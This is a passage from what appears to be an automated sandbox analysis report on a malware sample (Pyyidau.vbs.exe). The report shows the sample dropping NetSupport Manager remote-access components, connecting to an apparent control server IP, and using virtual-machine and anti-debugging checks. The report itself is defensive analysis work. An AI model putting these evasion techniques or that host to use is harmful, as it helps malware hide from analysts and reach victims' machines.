                                Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user\AppData\Roaming
                                Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user
                                Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer
                                Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft
                                Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini
                                Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user\AppData
                                Source: wscript.exe, 00000005.00000003.2439151550.0000000008E6D000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: VMware
                                Source: client32.exe, 00000028.00000002.2758262575.0000000000FE9000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Win32_PhysicalMemoryPhysical Memory 0Win32_PhysicalMemoryPhysical MemoryPhysical MemoryPhysical MemoryRAM slot #0RAM slot #0VMware Virtual RAM00000001VMW-4096MBrErrorC
                                Source: client32.exe, 00000028.00000002.2765516150.0000000007980000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: NECVMWarVMware SATA CD00e
                                Source: client32.exe, 00000026.00000003.2700209803.0000000004E7F000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Win32_PhysicalMemoryPhysical Memory 0Win32_PhysicalMemoryPhysical MemoryPhysical MemoryPhysical MemoryRAM slot #0RAM slot #0VMware Virtual RAM00000001VMW-4096MBLMEM
                                Source: client32.exe, 0000002D.00000003.2809017512.0000000005A90000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: NECVMWarVMware SATA CD00
                                Source: client32.exe, 0000002D.00000003.2807838031.00000000089AC000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Manufacturer = "VMware Virtual RAM";
                                Source: wscript.exe, 00000000.00000003.1718268854.000001B89C254000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
                                Source: PCICL32.DLL.22.dr | Binary or memory string: vmwareVIRT%d adapters in chain, %d adapters by size
                                Source: client32.exe, 00000028.00000002.2758262575.0000000000FD1000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: 00#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                                Source: client32.exe, 00000026.00000002.2709177904.00000000055A9000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing\Packages\HyperV-Compute-Host-VirtualMachines-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1J9$
                                Source: wscript.exe, 00000005.00000003.2455334046.0000000002E84000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: 000000000002004C4F4F50%02X%02X%02X%02X%02X%02XVirtualVMwareVIRTNETGetAdapt`
                                Source: pcicfgui_client.exe, 00000024.00000002.2672742567.000000000098E000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000026.00000003.2701254562.0000000000903000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                                Source: wscript.exe, 00000005.00000003.2439151550.0000000008E6D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %dWSAIoctlclosesocketsocketWSACleanupWSAStartupws2_32.dllIPHLPAPI.DLLVMWarevirtGetAdaptersAddressesHyper-VvirtualVMWarevirtBluetoothpfn..\ctl32\tcctlex.cppRtlIpv6AddressToStringWntdll.dllntohl%s%dNSNNSPChassisTypesSystemEnclosureWin32_SystemEnclosure
                                Source: client32.exe, 00000028.00000002.2758262575.0000000000F69000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll8
                                Source: client32.exe, 00000028.00000002.2758262575.0000000001045000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                                Source: PCICL32.DLL.22.drBinary or memory string: DoApplicationList type %d, found %d windows, max size %dWSAIoctlws2_32.dllGetAdaptersAddressesHyper-VVMWarevirt0000000000%02X%02X%02X%02X%02X%02XBluetoothpfn..\CTL32\tcctlex.cppRtlIpv6AddressToStringWntohl..\CTL32\tcputil.cpntohlpGetHostByNamegethostbynamepGetHostNamegethostnamepWSACleanuppWSAStartupWSOCK32.DLLSendARPSnmpExtensionQuerySnmpExtensionInitINETMIB1.DLLSnmpUtilVarBindFreeSnmpUtilOidNCmpSnmpUtilOidCpysnmpapi.dlll
                                Source: PCICL32.DLL.22.drBinary or memory string: vmware
                                Source: client32.exe, 00000028.00000002.2765780108.0000000007A96000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: NECVMWarVMware SATA CD00B0
                                Source: client32.exe, 00000026.00000002.2709177904.00000000055A9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: NECVMWarVMware SATA CD00c/
                                Source: pcicfgui_client.exe, 00000024.00000002.2676144643.000000006A868000.00000002.00000001.01000000.0000001F.sdmpBinary or memory string: DoApplicationList type %d, found %d windows, max size %dWSAIoctlclosesocketsocketWSACleanupWSAStartupws2_32.dllGetAdaptersInfoIPHLPAPI.DLLGetAdaptersAddressesvirtualVMWarevirtpfntcctlex.cppRtlIpv6AddressToStringWntohlresultpGetAdaptersInfotcputil.cpntohlpGetHostByNamegethostbynamepGetHostNamegethostnamepWSACleanuppWSAStartupWSOCK32.DLLSnmpExtensionQuerySnmpExtensionInitINETMIB1.DLLSnmpUtilVarBindFreeSnmpUtilOidNCmpSnmpUtilOidCpysnmpapi.dll
                                Source: client32.exe, 00000026.00000002.2709177904.00000000055A9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing\Packages\HyperV-Feature-VirtualMachinePlatform-Package~31bf3856ad364e35~amd64~~10.0.19041.2006
                                Source: client32.exe, 00000023.00000003.2652277705.0000000003184000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000023.00000003.2658395276.0000000003184000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWST_MUSIC_APP_DESCRIPTION}LMEM
                                Source: Pyyidau.vbs.exe, 00000003.00000002.1825322765.0000000004AD0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SerialNumber0VMware|VIRTUAL|A M I|XenDselect * from Win32_ComputerSystem
                                Source: wscript.exe, 00000005.00000003.2439151550.0000000008E6D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMWare
                                Source: Pyyidau.vbs.exe, 00000003.00000002.1831932926.00000000070B4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\DosDevices\D:
                                Source: Pyyidau.vbs.exe, 00000003.00000002.1825322765.0000000004AD0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: model0Microsoft|VMWare|Virtual
                                Source: client32.exe, 00000028.00000002.2758262575.0000000000FE9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware Virtual RAM
                                Source: client32.exe, 00000028.00000002.2762541707.00000000055EB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Win32_PhysicalMemoryPhysical Memory 0Win32_PhysicalMemoryPhysical MemoryPhysical MemoryPhysical MemoryRAM slot #0RAM slot #0VMware Virtual RAM00000001VMW-4096MB
                                Source: client32.exe, 00000026.00000002.2703111799.000000000097B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: "VMware Virtual RAM"
                                Source: wscript.exe, 00000005.00000003.2439151550.0000000008E6D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 000000000002004C4F4F50%02X%02X%02X%02X%02X%02XVirtualVMwareVIRTNETGetAdaptersInfoiphlpapi.dllcbMacAddress == MAX_ADAPTER_ADDRESS_LENGTH..\ctl32\macaddr.cpp%02x%02x%02x%02x%02x%02x* Netbiosnetapi32.dll%02X%02X%02X%02X%02X%02Xmap/set<T> too longinvalid map/set<T> iterator,%02X
                                Source: client32.exe, 00000026.00000003.2700209803.0000000004E7F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Manufacturer = "VMware Virtual RAM"
                                Source: C:\Windows\Installer\MSI264F.tmp API call chain: ExitProcess graph end node graph_28-55153
                                Source: C:\Windows\Installer\MSI2BE4.tmp API call chain: ExitProcess graph end node
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\checkdvd.exe API call chain: ExitProcess graph end node
                                Source: C:\Windows\Installer\MSI3FCC.tmp API call chain: ExitProcess graph end node
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exe Process information queried: ProcessInformation

                                Anti Debugging

                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\pcicfgui_client.exe Thread information set: HideFromDebugger
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\pcicfgui_client.exe Thread information set: HideFromDebugger
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\pcicfgui_client.exe Open window title or class name: procmon_window_class
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\pcicfgui_client.exe Process queried: DebugPort
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\pcicfgui_client.exe Process queried: DebugPort
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exe Process queried: DebugPort
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exe Process queried: DebugPort
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exe Process queried: DebugPort
                                Source: C:\Windows\Installer\MSI264F.tmpCode function: 28_2_00B382B3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,28_2_00B382B3
                                Source: C:\Windows\Installer\MSI264F.tmpCode function: 28_2_00B00130 GetLastError,_strrchr,_strrchr,GetTickCount,GetMessageW,TranslateMessage,DispatchMessageW,GetTickCount,GetMessageW,TranslateMessage,DispatchMessageW,GetCurrentThreadId,GetCurrentThreadId,GetCurrentThreadId,wsprintfW,wsprintfW,wsprintfW,GetCurrentProcess,GetProcessTimes,GetSystemTimeAsFileTime,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,wsprintfW,GetCurrentThreadId,wsprintfW,GetCurrentProcess,GetGuiResources,wsprintfW,GetCurrentThreadId,wsprintfW,OutputDebugStringW,wsprintfW,wsprintfW,GetModuleFileNameW,wsprintfW,GetTempPathW,GetLocalTime,_memset,GetVersionExW,wsprintfW,_fputws,_fputws,_fputws,_fputws,_fputws,_fputws,wsprintfW,_fputws,_fputws,_fputws,_wcsncat,wsprintfW,SetTimer,MessageBoxW,KillTimer,PeekMessageW,MessageBoxW,28_2_00B00130
                                Source: C:\Windows\Installer\MSI264F.tmpCode function: 28_2_00B25490 LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetUserNameW,FreeLibrary,28_2_00B25490
                                Source: C:\Windows\Installer\MSI264F.tmpCode function: 28_2_00B5C0DC __lseeki64_nolock,__lseeki64_nolock,GetProcessHeap,HeapAlloc,__setmode_nolock,__write_nolock,__setmode_nolock,GetProcessHeap,HeapFree,__lseeki64_nolock,SetEndOfFile,GetLastError,__lseeki64_nolock,28_2_00B5C0DC
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exe Process token adjusted: Debug
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exe Process token adjusted: Debug
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exe Process token adjusted: Debug
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exe Process token adjusted: Debug
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exe Process token adjusted: Debug
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exe Process token adjusted: Debug
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exe Process token adjusted: Debug
                                Source: C:\Windows\Installer\MSI264F.tmpCode function: 28_2_00B382B3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,28_2_00B382B3
                                Source: C:\Windows\Installer\MSI264F.tmpCode function: 28_2_00B3D4EC _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,28_2_00B3D4EC
                                Source: C:\Windows\Installer\MSI264F.tmpCode function: 28_2_00B2DDD0 SetUnhandledExceptionFilter,GetModuleFileNameW,GetModuleFileNameW,GetLastError,GetUserNameW,__wcsdup,LoadStringW,wsprintfW,__wcsicoll,GetPrivateProfileStringW,lstrcmpiW,GetModuleFileNameW,GetLastError,_wcschr,_wcschr,28_2_00B2DDD0
                                Source: C:\Windows\Installer\MSI2BE4.tmpCode function: 30_2_004A82B3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,30_2_004A82B3
                                Source: C:\Windows\Installer\MSI2BE4.tmpCode function: 30_2_004AD4EC _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,30_2_004AD4EC
                                Source: C:\Windows\Installer\MSI2BE4.tmpCode function: 30_2_0049DDD0 SetUnhandledExceptionFilter,GetModuleFileNameW,GetModuleFileNameW,GetLastError,GetUserNameW,__wcsdup,LoadStringW,wsprintfW,__wcsicoll,GetPrivateProfileStringW,lstrcmpiW,GetModuleFileNameW,GetLastError,_wcschr,_wcschr,30_2_0049DDD0
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\checkdvd.exeCode function: 31_2_00EB34C3 SetUnhandledExceptionFilter,31_2_00EB34C3
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\checkdvd.exeCode function: 31_2_00EA361B IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,31_2_00EA361B
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\checkdvd.exeCode function: 31_2_00EA7798 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,31_2_00EA7798
                                Source: C:\Windows\Installer\MSI3FCC.tmpCode function: 32_2_001BDDD0 SetUnhandledExceptionFilter,GetModuleFileNameW,GetModuleFileNameW,GetLastError,GetUserNameW,__wcsdup,LoadStringW,wsprintfW,__wcsicoll,GetPrivateProfileStringW,lstrcmpiW,GetModuleFileNameW,GetLastError,_wcschr,_wcschr,GetCurrentDirectoryW,_wcsrchr,PostMessageW,KiUserCallbackDispatcher,_fputs,Sleep,32_2_001BDDD0
                                Source: C:\Windows\Installer\MSI3FCC.tmpCode function: 32_2_001C82B3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,32_2_001C82B3
                                Source: C:\Windows\Installer\MSI3FCC.tmpCode function: 32_2_001CD4EC _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,32_2_001CD4EC
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exe Memory allocated: page read and write | page guard

                                HIPS / PFW / Operating System Protection Evasion

                                Source: C:\Windows\SysWOW64\wscript.exe Network Connect: 176.126.113.166 443
                                Source: C:\Windows\Installer\MSI264F.tmpCode function: 28_2_00B303E0 GetClassNameW,GetModuleHandleW,GetProcAddress,SHGetFolderPathW,LoadLibraryW,LoadLibraryW,GetModuleFileNameW,LoadLibraryW,GetProcAddress,GetWindowThreadProcessId,OpenProcess,CreateEventW,wsprintfW,CreateEventW,GetDesktopWindow,SendMessageW,Sleep,WaitForSingleObject,CreateEventW,IsWindow,GetClassNameW,IsWindowVisible,SetEvent,IsWindow,WaitForMultipleObjects,Sleep,WaitForSingleObject,IsWindow,WaitForSingleObject,FindWindowExW,GetWindowLongW,ShowWindow,ShowWindow,ShowWindow,WaitForSingleObject,WaitForSingleObject,ResetEvent,WaitForSingleObject,GetProcAddress,CloseHandle,GetDesktopWindow,GetWindowThreadProcessId,OpenProcess,OpenProcess,OpenProcess,GetPriorityClass,SetPriorityClass,GetDesktopWindow,SendMessageW,Sleep,SetPriorityClass,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,FreeLibrary,28_2_00B303E0
                                Source: C:\Windows\Installer\MSI2BE4.tmpCode function: 30_2_004A03E0 GetClassNameW,GetModuleHandleW,GetProcAddress,SHGetFolderPathW,LoadLibraryW,LoadLibraryW,GetModuleFileNameW,LoadLibraryW,GetProcAddress,GetWindowThreadProcessId,OpenProcess,CreateEventW,wsprintfW,CreateEventW,GetDesktopWindow,SendMessageW,Sleep,WaitForSingleObject,CreateEventW,IsWindow,GetClassNameW,IsWindowVisible,SetEvent,IsWindow,WaitForMultipleObjects,Sleep,WaitForSingleObject,IsWindow,WaitForSingleObject,FindWindowExW,GetWindowLongW,ShowWindow,ShowWindow,ShowWindow,WaitForSingleObject,WaitForSingleObject,ResetEvent,WaitForSingleObject,GetProcAddress,CloseHandle,GetDesktopWindow,GetWindowThreadProcessId,OpenProcess,OpenProcess,OpenProcess,GetPriorityClass,SetPriorityClass,GetDesktopWindow,SendMessageW,Sleep,SetPriorityClass,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,FreeLibrary,30_2_004A03E0
                                Source: C:\Windows\Installer\MSI3FCC.tmpCode function: 32_2_001C03E0 GetClassNameW,GetModuleHandleW,GetProcAddress,SHGetFolderPathW,LoadLibraryW,LoadLibraryW,GetModuleFileNameW,_wcsrchr,LoadLibraryW,GetProcAddress,GetWindowThreadProcessId,OpenProcess,CreateEventW,wsprintfW,CreateEventW,GetDesktopWindow,SendMessageW,Sleep,WaitForSingleObject,CreateEventW,IsWindow,GetClassNameW,IsWindowVisible,SetEvent,IsWindow,WaitForMultipleObjects,Sleep,WaitForSingleObject,IsWindow,WaitForSingleObject,FindWindowExW,GetWindowLongW,ShowWindow,ShowWindow,ShowWindow,WaitForSingleObject,WaitForSingleObject,ResetEvent,WaitForSingleObject,GetProcAddress,CloseHandle,GetDesktopWindow,GetWindowThreadProcessId,OpenProcess,OpenProcess,OpenProcess,GetPriorityClass,SetPriorityClass,GetDesktopWindow,SendMessageW,Sleep,SetPriorityClass,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,FreeLibrary,32_2_001C03E0
                                Source: C:\Windows\System32\wscript.exe Process created: C:\Users\user\Desktop\Pyyidau.vbs.exe "C:\Users\user\Desktop\Pyyidau.vbs.exe" -enc [Base64-encoded command omitted]
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exe Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\50d669f573135aafd57c..vbs"
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                Source: C:\Windows\System32\msiexec.exe Process created: C:\Windows\Installer\MSI2BE4.tmp "C:\Windows\Installer\MSI2BE4.tmp" /G"C:\Program Files (x86)\NetSupport\NetSupport Manager\" /EU
                                Source: C:\Windows\System32\msiexec.exe Process created: C:\Program Files (x86)\NetSupport\NetSupport Manager\checkdvd.exe "C:\Program Files (x86)\NetSupport\NetSupport Manager\checkdvd.exe"
                                Source: C:\Windows\System32\msiexec.exe Process created: C:\Windows\Installer\MSI3FCC.tmp "C:\Windows\Installer\MSI3FCC.tmp" /G"C:\Program Files (x86)\NetSupport\NetSupport Manager\" /EV"NetSupport School" /EF".\Log Files" /EF".\Bookmarks" /EF".\Tests" /EF".\Store" /EF".\inv" /EF".\Resources" /EF".\Help" /EF".\Image" /EF".\Sound" /EF".\Video" /EA /EX /EC /Q /V /Q /I *
                                Source: C:\Windows\System32\msiexec.exe Process created: C:\Windows\Installer\MSI51C1.tmp "C:\Windows\Installer\MSI51C1.tmp" /G"C:\Program Files (x86)\NetSupport\NetSupport Manager\" /EI
                                Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\SysWOW64\attrib.exe ATTRIB -R "C:\Users\user\AppData\Local\Temp\{CBB68368-7767-4CFF-B3E5-211488346702}\\nsm.lic"
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\pcicfgui_client.exe Process created: C:\Program Files (x86)\NetSupport\NetSupport Manager\pcicfgui_client.exe "C:\Program Files (x86)\NetSupport\NetSupport Manager\pcicfgui_client.exe"
                                Source: C:\Windows\System32\svchost.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 4296 -ip 4296
                                Source: C:\Windows\Installer\MSI264F.tmpCode function: 28_2_00B1A250 GetModuleFileNameW,_wcschr,GetCurrentProcessId,wsprintfW,CreateEventW,CreateEventW,GetLastError,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,wsprintfW,CreateEventW,GetLastError,CloseHandle,wsprintfW,CreateEventW,LocalFree,CreateEventW,CreateEventW,CreateEventW,CreateThread,SetThreadPriority,28_2_00B1A250
                                Source: C:\Windows\Installer\MSI264F.tmpCode function: 28_2_00B1A6C0 AllocateAndInitializeSid,LoadLibraryW,GetProcAddress,FreeSid,FreeLibrary,SetLastError,28_2_00B1A6C0
                                Source: client32.exe, 00000026.00000002.2715380092.000000006BDC6000.00000002.00000001.01000000.00000015.sdmp, client32.exe, 00000028.00000002.2767435656.000000006BDC6000.00000002.00000001.01000000.00000015.sdmp, PCICL32.DLL.22.drBinary or memory string: Shell_TrayWndunhandled plugin data, id=%d
                                Source: wscript.exe, 00000005.00000003.2453934056.000000000B614000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2454210130.000000000B614000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2482401323.000000000611C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: a+tca+tLogSOFTWARE\Productive Computer Insight\%swinstallwinst32Log=winst32.log%04d-%02d-%02d %02d:%02d:%02d.%03d defaultGetNativeSystemInfo missingcpu type is %d, probably not x64cpu is x64, setting wow64=TRUEiswow64process, setting wow64=TRUEPCISYS started okPCISYS created okPCISYS not created, already existsPCISYS not created, e=%dsystem32\drivers\pcisys.sysVideo InitPendingFileRenameOperationsSYSTEM\CurrentControlSet\Control\Session Manager\Client32Provider.dll\cicClient32Provider.dllRegisterClient32Provider reg=%dSoftware\Policies\NetSupport\Client\StandardScreenScrapeDllInstall(%s) inst=%d, cmd=%lsDllInstallInstallShellExt Doneerror - delete on restartCopy errorCopy %s to %sRename %s to %s - %sDelete %s - %serrorokPCIShellExt.newPCIShellExt.oldPCIShellExt.dllInstallShellExt %d, doshell=%dShell_TrayWndUnloading %s
                                Source: wscript.exe, 00000005.00000003.2453934056.000000000B614000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2454210130.000000000B614000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2482401323.000000000611C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: echo\tempfile.$$$\autoexec.nt\autoexec.tmpGetSystemWow64DirectoryAkernel32*old_wndproc == fpe:\nsmsrc\nsm\1410\1410\nt\winst32.cPROGMANrb+.lnk\Profiles\All Users\Start Menu\Programs\YesOnNSMWControl32NSMMainSeShutdownPrivilegebufAssert failed, file %hs, line %d
                                Source: MSI264F.tmp, MSI2BE4.tmp, MSI3FCC.tmpBinary or memory string: Shell_TrayWnd
                                Source: PCICL32.DLL.22.drBinary or memory string: Progman
                                Source: pcicfgui_client.exe, 00000024.00000002.2676144643.000000006A868000.00000002.00000001.01000000.0000001F.sdmpBinary or memory string: 1jFoxitReaderSubmitPeakFrameIntelNSM AppBar Callback MessageShell_TrayWnd
                                Source: pcicfgui_client.exe, 00000024.00000002.2676144643.000000006A868000.00000002.00000001.01000000.0000001F.sdmpBinary or memory string: 1EjProgman
                                Source: client32.exe, 00000026.00000002.2715380092.000000006BDC6000.00000002.00000001.01000000.00000015.sdmp, client32.exe, 00000028.00000002.2767435656.000000006BDC6000.00000002.00000001.01000000.00000015.sdmpBinary or memory string: kProgman
                                Source: winst64.exe, 00000021.00000000.2613624042.00007FF778F16000.00000002.00000001.01000000.0000000F.sdmp, winst64.exe, 00000021.00000002.2615985301.00007FF778F16000.00000002.00000001.01000000.0000000F.sdmpBinary or memory string: %04d-%02d-%02d %02d:%02d:%02d.%03d defaultPCISYS started okPCISYS created okPCISYS not created, already existsPCISYS not created, e=%dsystem32\drivers\pcisys.sysVideo InitPendingFileRenameOperationsSYSTEM\CurrentControlSet\Control\Session ManagerDllUnregisterServerDllRegisterServer\Client32Provider.dll\cicClient32Provider.dllRegisterClient32Provider reg=%dclient32.inirtclient32u.iniSoftware\Policies\NetSupport\Client\StandardclientScreenScrapeDllInstall(%s) inst=%d, cmd=%lsDllInstallInstallShellExt Doneerror - delete on restartCopy errorCopy %s to %sRename %s to %s - %sDelete %s - %sokerrorPCIShellExt64.newPCIShellExt64.oldPCIShellExt64.dllInstallShellExt %d, doshell=%dShell_TrayWndUnloading %s
                                Source: MSI264F.tmp, MSI2BE4.tmp, MSI3FCC.tmpBinary or memory string: PROGMAN
                                Source: pcicfgui_client.exe, 00000024.00000002.2676926399.000000006B852000.00000002.00000001.01000000.0000001F.sdmpBinary or memory string: Sorry, this is not supported on versions of Windows NT before 4.0. Please refer to the help file for details on how to do this in Program Manager. Configure TCP/IP Client Browsing+&Broadcast Addresses (or Client Addresses):.Print Files (*.prn)|*.prn|All Files (*.*)|*.*|.Sound Files (*.wav)|*.wav|All Files (*.*)|*.*|
                                Source: wscript.exe, 00000005.00000003.2455334046.0000000002E84000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2439151550.0000000008E6D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ProgmanError closing winsta, e=%d
                                Source: C:\Windows\Installer\MSI264F.tmpCode function: GetLocaleInfoW,GetLocaleInfoW,__alloca_probe_16,_malloc,GetLocaleInfoW,WideCharToMultiByte,__freea,28_2_00B586E2
                                Source: C:\Windows\Installer\MSI264F.tmpCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,28_2_00B587BC
                                Source: C:\Windows\Installer\MSI264F.tmpCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,28_2_00B52744
                                Source: C:\Windows\Installer\MSI264F.tmpCode function: GetLocaleInfoW,_GetPrimaryLen,_strlen,28_2_00B528E0
                                Source: C:\Windows\Installer\MSI264F.tmpCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,28_2_00B52839
                                Source: C:\Windows\Installer\MSI264F.tmpCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage,28_2_00B5293B
                                Source: C:\Windows\Installer\MSI264F.tmpCode function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,28_2_00B52BF8
                                Source: C:\Windows\Installer\MSI264F.tmpCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,28_2_00B52B0C
